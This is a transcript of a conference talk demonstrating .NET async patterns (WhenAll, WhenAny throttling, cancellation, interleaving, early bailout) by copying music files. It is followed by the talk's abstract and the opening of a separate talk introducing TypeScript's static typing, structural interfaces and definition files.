Let's move it up a bit, and then you can see it. While we're doing that, we'll also just have a look at the folder — not the source folder, I don't want that. So let's simplify it. We've seen where the source files are. Let's have a look in here. Right. So when we run this, we should start seeing files appear here. This is my user's temp area. We'll see files starting to appear. And this will prove that we're actually copying all these files at the same time. So even though we fired them all off with one line of code, we will be copying them in the background. And I've still managed to move the UI around a little bit. They're all temp files, and they gradually all become the real file when they're finished copying. And then eventually, play some music. So that just managed to queue up — now you can't hear me — that managed to queue up 17 file copies. Actually, more than that, 21 file copies, because there were MD5 hash files as well. And just copied them all simultaneously to that folder without me having to think about it. Well, I still have a UI I can play with. I could prove that I have a UI I can play with, because if I click that button twice while I'm running it, it will go and break, because I've forgotten to disable the button. So async await does not stop you from shooting yourself in the foot, which apparently is an analogy everyone's using today. So my phrase here is, it's a bit dull. It just copies music files, which is all it does. But has anyone written code that can copy 20, 30 files in the background themselves using threads? Was it fun? No. And that came back to the UI and could update the UI and tell you as it went along that it was doing stuff as well? Which is a horrible thing to have to do, to touch both threads. And you've got synchronization context and background threads and marshalling to deal with. So this is not a bad thing at all. So that's a lovely quick win on when all.
And you can imagine that there's loads of situations where you want to do multiple things. They submit a report. There's four things to go off to the database, but you can fire them all off. If they're not bound by a transaction, even better. Because obviously if you do a transaction across them, it gets a bit harder to do that kind of multi-threaded type approach. Some of you may still be in a world where people use the Microsoft Distributed Transaction Coordinator. However, I'm in a world that's eventually consistent. And I'm quite happy with it being eventually consistent. So I don't mind things that appear slightly out of order, as long as they get there in the end. You can't take that attitude to cooking. If you put the wrong things in at the wrong order in cooking, it tends to bugger up the meal. But in programming, a lot of solutions can be done out of order. It's quite fine. So we go on to another combinator. So we have when any. Now, when any is: hey, I've got a load of stuff. I've got all these things to do. When any of them finish — any, just one — come back and tell me. And then I can do shit. I can do stuff. So here the first thing you think is it's first one wins. So it's the kind of thing where you say, I've got a postcode, go find addresses. I'll use four different web services. One of them comes back. That's fine by me. I'll use that as my list of addresses. And I don't care about the others. You might use it in finance for share prices, things like that, whichever comes back first. You think, eh, it's fine. But actually there are much better ways of using when any. So these are the patterns that are in Stephen Toub's white paper. And seriously, when you see that I've used the exact same naming of a constant, that's how much I've lifted Stephen Toub's white paper.
But there's no point in reinventing that constant and giving it a different name. He gave it the right name to start with. So here we get throttling. Now, people use FTP clients. Who's used FileZilla? How many files can it download at the same time? Does it kind of stop at some point? About eight, maybe 10. You can set it. But normally, your browser doesn't download 500 files at the same time either. It's not normally a great idea to do that. So at some point, you start throttling. So one of the examples we had is we're in a digital media company. The record companies send us raw music files, really good quality, CD quality, WAV files, and we're converting them over. If they send us 10 albums, and they've got 10, 15 tracks each, I could throw 150 MP3 encodes onto an eight-core system. If I do that at the same time with no throttling and no thread control, I tell you now, that server's going to fall over. At the very least, when you remote desktop to it to see what's happening, you can't, because there's no CPU to allow you to get on that remote desktop. So loads of systems in life we have to throttle. So let's see how we can do that really easily with the when any construct. So I promise that this will be the last time I code by hand. And then we will use code snippets. But it's good to see how you build up this code and how it kind of uses these metaphors for a list of tasks, all that kind of thing. So we're going to copy a bit from previously anyway. We're going to get that list of file names to copy. Equally, I'm going to do something funky, which is a simple bit of lambda stuff: we're going to sort the file names so that they're in order, so all the track 1s come together, all the track 2s come together, all the track 3s, because we had them in the same format groupings before. And this allows us to see them being copied in order. We can see the throttling a bit easier. Squiggle, squiggle, squiggle. Looks good. Cultures.
Who uses cultures to compare strings? Right. One thing we're going to do is we're going to have a constant. So because we're going to throttle, we're going to have a concurrency level. We're going to say we're only going to do four things at once. We know we had 21 files, but we're only going to do four at a time. And then we'll batch them up. And that allows other things to happen. Someone else may be using my hard drive. Just maybe, especially if it's a server. So we're doing the same kind of thing. We're creating a new task. It's called copy tasks. So you can see how we're building from where we went from where in all differences. We're now going to set a concurrency level. So the thing is we're not going to loop through because we can't loop through. Because we're not going for I'm going to run every file in the system. What we're going to say is I'm going to set up the initial tasks. There may be less than our concurrency level. It could be that it's a sometimes when you get an album from a record company, it could be a single track download. There aren't four things to do in the background. You only have one thing. So we've got to make sure we don't go too far. But otherwise, we're pretty much going to use the same code we did before. The only thing we're going to do that makes it nicer is we're going to have some progress bars because it's nice to see these files just being updated. I remember the days in VB6, where you had indexed controls on web forms and it was much easier to deal with it. And this one I've had to actually do a bit of reflection in jiggery-pokery or select case statement, I think, to get around it, which is a bit of a pain. So that will just mean that while we're copying these four files, you'll see the progress bar go starting, done, starting, done, starting, done. And it makes it much more obvious what's happening on the UI. To give you a feel for how you might actually allow people to see what's happening. 
But realistically, that's just a setup. So yeah, that looks a bit complex. But what we're doing is preloading four tasks into our collection of tasks. What we're then saying is we're going to start executing. And this is the bit where you kind of go, yeah, this is where — oh, that's how you use when any. That's how you're going to use it. So the thing we're going to play this time, because I wanted you to obviously hear all the different tracks off the four track album, is we're going to play a different track. We're going to play track four, realistically. We're going to play the last FLAC track to prove that you can actually play a FLAC track. So: copy task is completed. And the real point is I've missed a line. This is where I am going to nick a bit of code for you, because I can just see myself overrunning. And we really want to see all the types. So what we're going to say is — oh, yeah. I have to go one down, though. I need to show you the one at the top. So what we're going to do is we're going to take our list of all the tasks. And we're saying, if there is still stuff to do — and that's what this line is — if we still have some tasks that need processing, because we have tasks in this list, then wait for the first one to come back. First one. The moment you say when any, you start running all those tasks in the background. Now, there's only four in there, because we made sure we only put four in at the very start. We then say, if it completed — because it could fault, it could have other things happen, so we're going to check it's completed — then we remove it from our list of tasks. It's quite cool. This list of tasks — because we know it's finished now, we don't need it any more. We then say, hey: we had a copy task list of four tasks, four file names. One of them's finished. We remove that task and get rid of it. We then get to see if we've got any more files to copy. We have got more files to copy. Create a new task. In we go. That's going to annoy me.
Right, good. What we're going to do is create a new task. We had four, one finished. We had three. We've still got file names. We're going to create another one and go back to four. So that's what we did. Then we say, by the way, if it's FLAC, note it down, so that we can play this very last track, which we know is a FLAC file. Then when we get that, we're going to play that audio track. The last FLAC file copied — that's the one we're going to use. We just tidy that off and actually compile. So what we're looking at is we start with 21 files that we're going to copy. We put four of them in an array. We get one of them to finish. We put one back. Finishes, put one back. Finishes, put one back. This happens quite a lot, until all 21 files have been processed through that list. Then it goes three, two, one, finished. And the while loop ends. And then we can deal with it. So what does that look like in terms of what our file system is going to do? Well, what's going to happen is we should get four temp files at a time. So we haven't got that big list of all these temp files. We're now only copying four at a time. And they're gradually going through and possibly stopping dead, which is unusual. How much do you want to bet that's an exception about to fire? That's interesting. A really interesting thing is, when I was playing with this the other day — because we now have Git integration inside of VS 2013 — it was watching files and locking them. It's great, because it hadn't versioned them, but it had got a handle on them. Let's have another go. So we're copying four at a time. They should be appearing. Four at a time. Yeah. I wonder what happened. And there you are. And then it finally starts playing the last file. So that's throttling. That's very quickly allowing you to say, hey, I only want four things to happen at once. Now, yes. Was that a pretty amount of code? Realistically, no. But it wasn't a lot of code. It's not hard to put that in.
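The throttling loop just described, sketched without the UI plumbing; `copyFileAsync` stands in for the talk's copy wrapper, and the constant name follows the white paper:

```csharp
using System;
using System.Collections.Generic;
using System.Threading.Tasks;

public static class ThrottlingDemo
{
    private const int ConcurrencyLevel = 4;

    // At most ConcurrencyLevel copies in flight at any moment.
    public static async Task CopyThrottledAsync(
        IReadOnlyList<string> fileNames,
        Func<string, Task<string>> copyFileAsync)
    {
        var copyTasks = new List<Task<string>>();
        int nextFile = 0;

        // Preload up to four tasks — there may be fewer files than that.
        while (nextFile < fileNames.Count
            && copyTasks.Count < ConcurrencyLevel)
        {
            copyTasks.Add(copyFileAsync(fileNames[nextFile++]));
        }

        while (copyTasks.Count > 0)
        {
            // Wait for whichever copy finishes first...
            Task<string> completed = await Task.WhenAny(copyTasks);

            // ...it's done, so we don't need it in the list any more.
            copyTasks.Remove(completed);

            if (completed.Status == TaskStatus.RanToCompletion)
            {
                Console.WriteLine("Copied: " + completed.Result);
            }

            // ...and top the list back up to the concurrency level.
            if (nextFile < fileNames.Count)
            {
                copyTasks.Add(copyFileAsync(fileNames[nextFile++]));
            }
        }
    }
}
```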
A load of this code, to be honest, is to do with UI stuff. And it's much more simple if you didn't have the UI, really. So this is a really fantastically easy way to do that situation where you're going to throttle. We're going to do four, five, six things at once, and we don't want any more than that to happen. If any of those tasks, by the way, faulted, had an exception, it would come back. We could handle that exception, throw another task in, and keep going if you wanted to just process everything. The other thing that happens is someone normally, one of the questions is, when the first one comes back, what if while you're waiting and then you do an await when any, one of those tasks that was still in there has finished? Well, it just pulls the next one off that's finished. Straight away. It doesn't even kind of really wait for them to get going. It just kind of goes, right, okay, have that, have that. So solves all that kind of thing. Redundancy. Now, this is the one where you thought this is how when any was always going to work. It's the first one wins and comes back. So, you know, that's really good because that's the stock price. It's a geo lookup, that kind of thing. This is much easier. I mean, much easier. Let's just close down a bit. I'm still running. Get out of the debugger. So when any first wins, let's copy that in and open the file. So what's behind this button? Well, we're going to put this behind this button. This is a world of cut and paste because I was too lazy to simplify it. Right. I just cut and paste and do the third track. Flack, AAC, OGG, M4A. Don't care, just copy them. Just copy them. And the first one that comes through, we're fine. Just go with it because this is the one where I don't care what the quality is. I just would like to get it as fast as possible. So that's which BitTorrent site has managed to download the latest episode of Game of Thrones. That's the one that I'll do. That kind of thing. 
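The first-one-wins pattern might be sketched like this; the file names and the `copyFileAsync` delegate are illustrative stand-ins, not the demo's actual code:

```csharp
using System;
using System.Threading.Tasks;

public static class FirstWinsDemo
{
    // Fire off the same track in every format and take whichever copy
    // lands first — typically the smallest file, since it copies fastest.
    public static async Task<string> CopyFirstAsync(
        Func<string, Task<string>> copyFileAsync)
    {
        Task<string>[] copies =
        {
            copyFileAsync("track3.flac"),
            copyFileAsync("track3.mp3"),
            copyFileAsync("track3.ogg"),
            copyFileAsync("track3.m4a"),
        };

        // WhenAny returns the first task to complete. Note the losers
        // keep running in the background unless you cancel them.
        Task<string> winner = await Task.WhenAny(copies);
        return await winner;
    }
}
```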
So if we run that, we should see — let it get going — I should see that folder get emptied. Going to do a simple thing where we go when any, first wins, copies all the files, starts playing one of them. There. Now the interesting bit about this, if you've noticed, is how many files did it copy? Four. And that's interesting, because I didn't care. I just wanted the first one, but it kind of carried on doing all the tasks for me. So now there's two views on this. One is, I don't want it to carry on doing the tasks. I'd like it to cancel all the other tasks and get rid of them. The other one is, in finance, when you're looking at share prices: I want all the tasks to complete when I'm looking at the share price from a market maker, because we pay them for looking at the share price, and if we don't complete the call, we can't record the transaction number, put it in the audit trail and then reconcile the accounts. So this is not stupid, that it allows all the tasks to finish. But it may not be what you want. But that's fine, because, as I said, because they're using the Task Parallel Library, and because we are returning Task of type string, we have cancellation support built in. Right. So this is going to make life easy. So all we need to do is, that boilerplate code that we did have — we're going to do a cancellation token source. I am going to increase the... You're right. Sorry about that; because I closed the window, it reset to 100%. So we have a cancellation token source. You'll notice we've got red lines all over this, and that's because we haven't actually designed CopyFileAsync to support cancellation. A cancellation token source is not a magic bullet. I cannot just say, I have a cancellation token source — whoa, put it on this task, I'll cancel, and it will do everything for me. It's not going to. You need the async method that you're going to call to support cancellation. That's quite important.
So I said earlier that once you've used async once, it tends to litter your code down the call stack. Once you've used a cancellation token, it will probably litter your code with cancellation tokens being passed all the way down the call stack. At this point I'm going to nick that bit of code rather than type it out. So we have CopyFileAsync. We have the version with cancellation, and it's just an overload we're going to have. So don't worry, it will go bigger in a second. Mm-hmm. So there's the async, the normal version, and here's the one with cancellation, and we'll walk through that and tidy it up. Yes. Right. So one developer said, I'd like to just throw a cancellation token, go cancel, and everything just stops. And I said, that's great — the .NET framework must be getting really intelligent, because it knows whether you're in the middle of doing something serious, like a transaction, or halfway through opening a file, and knows how to clean it all up, and knows better than you what you intended to do. And the problem is it doesn't. It doesn't know what to do if you get cancelled. Because it can't. It doesn't know what you're doing. It doesn't know, realistically, what the aim of that file copy is. It might not matter if you stop halfway through. It might be quite critical if you stop halfway through. So really, you can't do that. So that's why you have this concept of cancellation tokens that you hand to your async methods. And the async method, when it's cancelled, says: this is what I do when I get cancelled. These are the actions I have to take. If you didn't use a cancellation token, you could probably get the thread process and just kill it. But that's like Task Manager finishing Outlook, which you have to do regularly. But, you know, it's one of those things you don't want to do. If you write your own code, you can build all this in. So we pass in a cancellation token. Cancellation tokens are really simple things. They are in the Task Parallel Library.
You have a cancellation token source. You new that up, and it immediately creates a singleton of a cancellation token that's thread safe, that you can hand to multiple threads. So that's good. The reason it works is because the source stream's CopyToAsync supports a cancellation token. If someone in the .NET framework wrote an async method that doesn't support cancellation, you're stuffed at that point, for the await side of things. You can spot it at other points. You could spot it in your loop. But realistically, this isn't a loop. That's the one copy that's happening. So fortunately, they support cancellation. And how does cancellation work? It throws an exception in your code. So that may horrify you, that it throws exceptions. Exceptions are like nulls in databases. The older you get, the more you like them, and the more you think they're a good thing and not a bad thing. Just because it makes it slightly harder to program doesn't mean they're bad. Importantly, what we're going to do — well, unimportantly, we fiddle with the UI to make it look pretty. But more importantly, we are going to check if we have a temp file. And if we have a temp file, because we were in the middle of copying this file, we'll delete it. So this is where, if it had just killed the process, we'd have TMP files all over the place, which is really messy. So this cleans it up for us. So this is basically going to copy four files. The first one wins, and it will cancel the rest, and they won't get copied. And even if they're halfway through, it will clean up. I should have checked that that built properly. And it did. Good. So when any, first wins. So it's first wins, and it should clean up. So we only have one file at the end. Yes. And there we are. And if I run it again... Yeah, I haven't cleared down the files properly. That's annoying. See, this is the problem with async. You'd better make sure you're not still doing things in the background.
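A cancellation-aware copy overload, sketched under the assumptions the talk describes: CopyToAsync takes the token, cancellation surfaces as an OperationCanceledException, and cleaning up the half-written .tmp file is our job. The class and parameter names are mine:

```csharp
using System.IO;
using System.Threading;
using System.Threading.Tasks;

public static class CancellableCopy
{
    // The framework can't know what "cancelled" means for this
    // operation, so the catch block is where we decide: delete the
    // half-copied .tmp file, then let the exception keep propagating.
    public static async Task<string> CopyFileAsync(
        string sourcePath, string destinationPath, CancellationToken token)
    {
        string tempPath = destinationPath + ".tmp";
        try
        {
            using (var source = new FileStream(
                sourcePath, FileMode.Open, FileAccess.Read))
            using (var destination = new FileStream(
                tempPath, FileMode.Create, FileAccess.Write))
            {
                // CopyToAsync observes the token for us mid-copy.
                await source.CopyToAsync(destination, 4096, token);
            }
            File.Move(tempPath, destinationPath);
            return destinationPath;
        }
        catch (System.OperationCanceledException)
        {
            if (File.Exists(tempPath))
                File.Delete(tempPath);
            throw;
        }
    }
}
```

One CancellationTokenSource can hand its single token to all four copies, so one `Cancel()` call stops the lot.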
I will check that we do the cancellation. Yeah, it should cancel that down. And there you are. That was me. When I copied that code in, no one screamed. You didn't clear down the previous run. And this is actually a valid... I kind of, you know, it's never great when actually things don't go quite right. But it's a good example of how you have to think about this. In general, you disable the button so you can't click it twice. That's the easiest way of doing it. That's not necessarily, you know, a nicer way is clearing it down, stopping it playing and restarting it all. So let's see that in action again. So now, that's why I put all that protection code in. So we can see it's got the org file again, because that was the smallest, so clearly that was going to win. This is where it's not going to do it for me. Go on, go on. I'm trying to generate a very weird edge case that's hard on an SSD to do, because it keeps copying them really fast. It's about one in 20 times. That's the annoying bit. Go on. It's not going to do it. Ah. What you will find if you click this enough and you have a system that's marginal and somehow can get away with this, they may have improved the compiling in 2013 from 2012, but I doubt it. What occasionally you get over here is you see the org file and the MP4 file, because they're virtually the same size. And when you hit the cancellation, in between you hitting the cancellation token to say, cancel, and it raising it, it finished copying the file. And our canceling exception only deletes TMP files. So that's an example of you've got to start thinking, we're multi-threaded. This is a bit of a pain at times. So you have to be a bit defensive on how you do things, like clear up, like handle all this kind of stuff. So, well, that's cool, because we did first one, one. We deleted them all off, and we saved on network bandwidth, people were doing network bandwidth and things like that. Interleaving, your browser does this all the time. 
You know, it does not download a web page one item at a time... until you embed some JavaScript in your CSS page, and then it can really screw your page load up, I tell you now. There are certain times when it will start downloading one item at a time before it renders your page, and you want to avoid that. But in general, if there's a load of images on a web page, it will download them all in the background separately, and it will start showing them to you, possibly out of order. And the page has that little kind of dance after half a second, where it looks like crap, and then goes: right, that's what I was meant to look like, now I've got the CSS file. And then it's cached, and it all looks fine the next time. So that little jiggle. So we can do that with WhenAny. We've got that ability to do this interleaving. So the idea here is we have some task that we've got... do, delete, there. We have some task which is long running, but we have some menial task that, once a single task is finished, we can execute, like that. So there's no point doing an await on it, because it's really fast. Why await something that can execute in like 10 milliseconds? No point; might as well just do it. So what we're doing is getting all those file names to copy again. We're creating a load of tasks to copy. Going through, doing this WhenAny. Again, it's this concurrent thing; nothing extra is running in this case, we're just asking it to do it. And what it's going to do is, every time it's downloaded a file, we're going to check the MD5. MD5 is just a checksum. So in the case of music files, they give you an MD5 generally, so you can check that the music file delivered from Warner Brothers is actually correct, and that we've got the right content, which is a nice thing to do, because unbelievably, FTP is not the most reliable protocol in the world at times, and can get corrupted. Or they can copy the wrong files into a folder with the wrong MD5s, which is even more the problem.
So interleaving: we've got some heavy IO process, and all we're going to do is do these MD5s in the meantime. So while they're all copying, we could do this MD5; we didn't really hold much CPU time up. We've managed to check these as we went along, and we ended with a file, music being played. And you think, well, that's kind of good, you know, interleaving. But in the example I just gave, what would happen if an MD5 is incorrect? You wouldn't want to carry on downloading. So this is the real advantage of that interleaving: early bailout. So if you are downloading 20 tracks from an album from Warner Brothers to sell in your online music shop, and you have one track that isn't there, that's corrupted, you don't sell the album, and there is virtually no point putting it in the encoding process. If you haven't got the original file, don't bother. Again, a great developer, an innocent young child, who you know, Scott, said: but surely we could sell the 19 tracks that are okay. If you look at the legal contract, that's it. For a record company, you don't go around selling the single tracks. If you're meant to be selling the album, it's a kind of joint deal: you get the album, and you get the single tracks, and you're really meant to tell them if you haven't got the data. So, in that sense, while in the theoretical world it might be interesting to survive one of those tracks not arriving, in the real world we want to stop and get out of there. And the code for that's nice and easy, because you saw we had cancellation. So we're building on that. We had cancellation. We had interleaving. So now all we need to do is say: hey, if we get an invalid... so this is the standard thing we're just doing, we're interleaving, but this time we're saying, if we have an invalid MD5, we are going to cancel all our tasks and stop copying files, because we don't want this data. It's dead to me. So, let's build that. So it's quite nice.
The cancellation was with WhenAny. That allowed us to clear up. Now we're using cancellation with interleaving. That allows us to do early bailout. All this is using familiar stuff. If anyone has done the TPL, this is quite familiar. It's using tasks. It's using cancellation tokens. So, what I can do is run that. We're going to see a load of files come through. Clearly, this is going to work, I think, because all the MD5s are correct. Yeah. Looks like, yeah, they're all valid. So, what I really need to do is edit one of these MD5s. So, let's edit one. If you ever wondered what an MD5 looks like, it should be in here somewhere. Of course, it's not. Let's go and get... into the AAC. We're going to edit one of these MD5s. It's just a random hash of numbers. We're going to edit one of them. Numbers and letters. We'll edit it. It now won't work. So, we can look at that folder. So, we are now going to do it, and we should have a failure of an MD5, and we get played the track that had the problem, so we can see what's wrong with it. And it should bail out and stop copying files for us. What a shame. You got Rick Rolled. Never mind. That is a pretty sackable offence for a speaker, to still be Rick Rolling people. But, yeah, the keen-eyed amongst you there would see that I played audioTrack with a lowercase t, not an uppercase T, and that goes to a method that lies and just Rick Rolls you. But that's great, because we can actually cancel out and stop doing things because something went wrong. So, resources for this talk. The parallel team blog: whenever they're doing something interesting, they shove it up there, and that's where you'd find out about white papers. That white paper is two and a half years old. Shame on you for not reading it, because it actually is quite useful for this. And the BCL package is available as well, for those with server deployments that won't allow 4.5. Not that many now. I think we're gradually getting to the point where it is all on there.
Those BCL packages actually help if you're doing Windows Phone development and things like that, which aren't on 4.5. All the code and slides are available on GitHub under WestleyL; search for the repo to do with async patterns. Tomorrow, I'm doing Actors, so there are two NDC Oslo repos up there. So, if you want to get me on Twitter, it's WestleyL. I promise I talk about drinking and IT on that, not food. I have WestleyJam for food and family stuff and gardening, so you do get a pure IT feed. You can email me at any point. I'll mention Huddle again, because Huddle pay me to do things like this, as in they don't make me take holiday to come to a conference, which is quite cool of them. We have jobs: QA, devs. If you're going to go for a job at Huddle, please talk to me first, because there's a signing-on bonus, clearly. And I promise we will share a chunk of that at a Michelin-starred restaurant in London once you're through your probation, so we will enjoy that bonus if it happens. And that's it. Any questions? Wow. Yes? When async/await came out, I saw a presentation about it, but I remember some warning that if you're running a web application on an IIS server, which is already heavily threaded, you should be very careful about spinning up a lot of new threads in your methods. You should be very careful about using await async on an IIS server, and yes, you should, because you cannot just run up lots of threads willy-nilly. The point about these threads that you've seen is there are no more threads than the process that was running them. This is IO completion in the background. Therefore, all the things you've seen today realistically run on one thread. That was the UI thread. So all it was doing was allowing the IO to complete in the background, and sign up delegates, callbacks. That's quite safe.
Creating a load of threads from a thread pool, slamming them into a WhenAll in the middle of an ASP.NET page, is asking for trouble, because you're going to have a hard job reconciling it, especially as the page lifetime means it disappears before you can clean up. And then you're all into that mess, that world of pain. So I think you were right to be warned about being cautious about using await async liberally in your ASP.NET pages. Now this, as I said, is a good question, because this is virtually single-threaded. If you want to do proper multi-threaded processing, you really need to come to the talk about the actor-based pattern tomorrow on TPL Dataflow. And that's when we'll take code and actually make it run on multiple threads and actually have complicated pipelines of processing, all with a handy NuGet package. And it makes certain things that you thought about with await async... you go: this is much easier in Dataflow, if you're doing that kind of processing. So it would have been wonderful when we were doing MP3 encoding to have Dataflow, because it would have made our life so much easier. So that's tomorrow. I think it's the second talk of the day, and I'll be presenting on that. Okay? Another question? One question about the... if I fire up a lot of tasks and wait for them here, and they finish with an exception when I cancel them: creating an exception is quite resource-intensive, and if I create a lot of exceptions, will it just... There's a real myth, I would say, that exceptions are really expensive in, like, .NET. Yeah, I know what you mean: when you're throwing an exception, your machine seems to grind to a halt as it dumps a stack trace out, builds it all, gets all the marshalling on it. But remember that exceptions are exceptional. They really shouldn't be happening that often. The cancellation exception is lightweight; it's not going to cause the damage you think it's going to cause.
And when you get exceptions out of tasks, they come as aggregate exceptions, so they all get bundled together. And virtually, it's the first exception generated that causes you the most grief. After that, it tends to be quite fast to do exceptions. And you're already in a situation where you're cancelling it for a good reason. So the loss of time on that cancellation's got to be less than the time of allowing all those tasks to flow through to completion. There must be some reason you're deciding to throw that. The other way of doing it is you can, if you want, monitor the cancellation token, spot if it says it's cancelled, and then cancel out on that. But if you're handing a cancellation token to a .NET framework async method, it's going to throw an exception. And people will expect your code to throw an exception, rather than just silently end. So, you know, it's one of those things, I'm afraid. What you'll find with Dataflow is it doesn't throw cancellation exceptions; it drains your tasks really nicely for you. So that actually doesn't throw exceptions, it handles it all internally, and it works really nicely: you can see that you're allowing jobs that are multi-threaded to complete. Okay. Thank you very much. Thank you.
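The two styles mentioned in that answer — throwing on cancellation versus quietly spotting that the token is cancelled — look like this in a small TypeScript sketch, with AbortSignal standing in for CancellationToken and an invented function name:

```typescript
// Cooperative cancellation sketch: a loop can either poll signal.aborted
// and return quietly, or throw, so callers can tell "cancelled" apart
// from "finished" - the behaviour the .NET framework methods choose.

export function sumUntilCancelled(
  values: number[],
  signal: AbortSignal,
  throwOnCancel: boolean
): number {
  let total = 0;
  for (const value of values) {
    if (signal.aborted) {
      if (throwOnCancel) throw new Error("operation cancelled"); // exception style
      return total; // quiet style: just stop early
    }
    total += value;
  }
  return total;
}
```

The exception style is noisier but unambiguous; the quiet style leaves the caller unable to distinguish a partial result from a complete one, which is why framework methods throw.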
The new Async features come along with the very useful WhenAll and WhenAny methods to execute sets of tasks. We will delve into how these work, the effect of exceptions within any individual task and cancellation. This leads to the creation of common patterns such as Redundancy, Interleaving, Throttling and Early Bailout. Given time we'll also get to peek at progress reporting, something that provides the feedback to add further sophistication to these common patterns. Expect overviews of the patterns, followed by lots of code samples so get the latest Visual Studio 2012 RC installed ready for action.
10.5446/50616 (DOI)
Hello. Thanks for coming. My name is Mark Rendle. I am old and I've been writing software for a very long time, and when I started it was dumb character terminals and 80 columns and 20 rows and all this sort of thing. And up until a couple of years ago I was one of those people who would say: oh, you can't write any kind of serious application in the browser; you need WPF or Silverlight or something like that. And then I started writing Zudio, which is a browser-based toolkit for managing Azure storage so far, more stuff coming soon. And actually the reason I started writing that was because I wanted to be able to fiddle with my blobs from my iPad. I'm sure everyone here has spent some time fiddling with their blobs on their iPad. And I started: oh, I'll learn Objective-C and write an iPad application. Then I thought: well, why not try and do it as a web app? And so I started out with jQuery and Knockout and various other bits and pieces. And then I kind of discovered AngularJS at the same time as TypeScript. And the two of those things put together, to someone who had up until that point been mainly a WPF programmer... actually these two things together are like the data binding dream, the MVVM dream of WPF, but it actually works and it's nice and it's easier than doing it any other way. So I thought I would come and share my joy and glee with the world at large. You're welcome. So, TypeScript. Has anyone done any TypeScript already? Yeah, a few people. For those who haven't: why the hell not, you idiot. TypeScript is JavaScript++. TypeScript was created by Anders. Anders Hejlsberg, the C# guy, got very, very bored while they were writing the Roslyn compiler. He couldn't add any new features to C# while they were doing that, and so he went off and invented another language in the meantime. And he decided to fix JavaScript, because Microsoft, with Outlook.com and Office Online and all these sorts of things, they've got some big, big JavaScript projects.
And it's quite difficult once you get past a certain number of lines of code to keep track of everything and for teams to work together on stuff. So TypeScript is designed to solve that problem. And the things it adds to JavaScript in order to do that, the main one is static typing. Anders likes static typing, therefore we like static typing. And TypeScript adds static typing so you can actually tell the editor and the compiler what type an object is going to be so that it can actually give you decent IntelliSense. And if when you try and compile it, you've tried to pass a string to something that's expecting a customer, then the compiler can go, that's not going to work. It also brings in a bunch of features from ECMAScript 6. So they wanted to add in things like classes and so forth and obviously they needed to come up with a decent syntax for that. And ECMAScript 6 has actually defined a class syntax which is going to be in the next version of JavaScript in the browser. And so the TypeScript team have been tracking the syntax for ECMAScript 6 so that when it's actually released and all the browsers are supporting it, which will be in like six months for Firefox and Chrome and two and a half years for Internet Explorer, they can just say, well, if you're targeting ECMAScript 6, we won't compile the class thing, we'll just leave it in there. The other thing it adds is the compilation step, which there's a lot of discussion in the sort of dynamic versus static and the Ruby guys and whatever that if you've got enough tests, you don't need static typing. But actually you end up writing a lot of tests that could be handled by a compiler if you did have static typing. So whilst having it doesn't mean you don't have to write any tests, I like to think of it as unit test zero. That compiled step, the first thing that has to pass is your first unit test. And so TypeScript gives you that. 
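As a tiny illustration of the kind of checking being described (all names below are invented, not from the talk's project): the annotations exist only at compile time and are erased from the emitted JavaScript.

```typescript
// Static typing sketch: the Customer annotation is checked by the
// compiler and then erased - the emitted JavaScript has no trace of it.

interface Customer {
  name: string;
  id: number;
}

function greet(c: Customer): string {
  return `Hello, ${c.name} (#${c.id})`;
}

export const message = greet({ name: "Ada", id: 1 });
// greet("just a string"); // would not compile: a string is not a Customer
```

That commented-out line is the "unit test zero" in action: a whole class of mistakes is caught before anything runs.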
The static typing is similar to C#, similar to some other languages, but it's got some advantages of its own. It supports generics, which is great: you can have generic lists and generic functions and generic classes and generic interfaces. It supports interfaces, and it supports them with structural typing. And if you don't know what that is, it's awesome, and I really wish they'd put it into C#. Structural typing says: okay, I've declared an interface and it's got these two properties and this method on it. The compiler should, at compile time, be able to tell whether a class implements that interface without the class needing to say it implements it. Go does that. Dart, I think, does it. Swift doesn't, which is interesting. And TypeScript does this as well. The really nice thing about TypeScript doing it is, obviously, in JavaScript you throw around anonymous objects quite a lot, and an anonymous object in TypeScript can implement an interface, and the compiler can tell you if you've done it wrong, which is great when you're passing things like option hashes to jQuery methods and so forth. It also gives you IntelliSense™, or code completion in any other editor, which is nice. And the other thing is that when you're writing JavaScript, you're very rarely writing vanilla JavaScript, unless you're Rob Ashton, in which case you're not using TypeScript anyway because it offends you; you're now hand-coding asm.js. But for the rest of us, joke for one person there, for the rest of us who want to use jQuery, want to use Angular or Backbone or Knockout or whatever it might be, it's no good us having this statically typed language if we're consuming JavaScript libraries which don't have static types in. So TypeScript gives you definition files, which are .d.ts files. And the best way to think of these is they're like .h files from C or C++.
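Here is a small sketch of the structural typing just described, with invented names: the object literal never declares that it implements the interface; matching the shape is enough for the compiler.

```typescript
// Structural typing sketch: describePerson() accepts anything whose
// shape matches Named - no "implements" declaration required.

interface Named {
  first: string;
  last: string;
  fullName(): string;
}

function describePerson(n: Named): string {
  return n.fullName();
}

// An anonymous object satisfying the interface purely by its shape:
export const result = describePerson({
  first: "Grace",
  last: "Hopper",
  fullName() {
    return `${this.first} ${this.last}`;
  },
});
```

Had the literal misspelled a property or returned the wrong type from fullName, the compiler would reject the call — the option-hash scenario mentioned above.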
Unless you've never done C or C++, in which case that won't make any sense to you at all. But it's like a file that just says: this is the way things are. The compiler uses it as a reference when it's compiling, and the editor can use it as a reference when you're typing, but then it goes away once the thing's actually compiled and you're running it. And when they announced this, people started going off and writing definition files. And this chap, Boris Yankov, decided he was going to start a repository, and he said: everyone send me your definition files and I will curate a collection of canonical definition files for all the different libraries. And me being cynical, I went: that's not going to work; people aren't going to want to hand over their stuff and give you the credit for everything. But if we just pop over to DefinitelyTyped... quickly... you can tell that I go there a lot: I typed "git" and that's Chrome's first guess. But this is the DefinitelyTyped repository, and these are all the definition files that are in there. It goes on for quite some time. There are definition files for pretty much every client-side library, and also quite a lot of Node libraries as well. So you can use this on client side and server side. So the ECMAScript 6 features that they've brought in at the moment are classes and modules. JavaScript's got various hacky ways of doing modules, and ECMAScript 6 has kind of given it a module keyword so that people can just use that instead. And ECMAScript 6 classes: the TC39 committee, who create ECMAScript, have finally accepted that prototypal inheritance is not necessarily something that people can get their heads around. And so they have finally created a class syntax for the next version, and that's got methods and inheritance and properties and constructors and all this sort of stuff. They've actually done a really good job of it, and that's what TypeScript's class syntax is taken from.
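A definition file contains only declarations, so a minimal hand-written slice might look like the following. This is a hypothetical library invented for illustration, not one of the real DefinitelyTyped files: no JavaScript is ever generated from it; it exists purely for the compiler and the editor.

```typescript
// greeter.d.ts - a slice of a made-up definition file for a plain
// JavaScript library. Like a C .h file, it only describes shapes.

declare module Greeter {
  interface GreetOptions {
    loud?: boolean;        // optional members get a ?, handy for option hashes
    punctuation?: string;
  }
  function greet(name: string, options?: GreetOptions): string;
}
```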
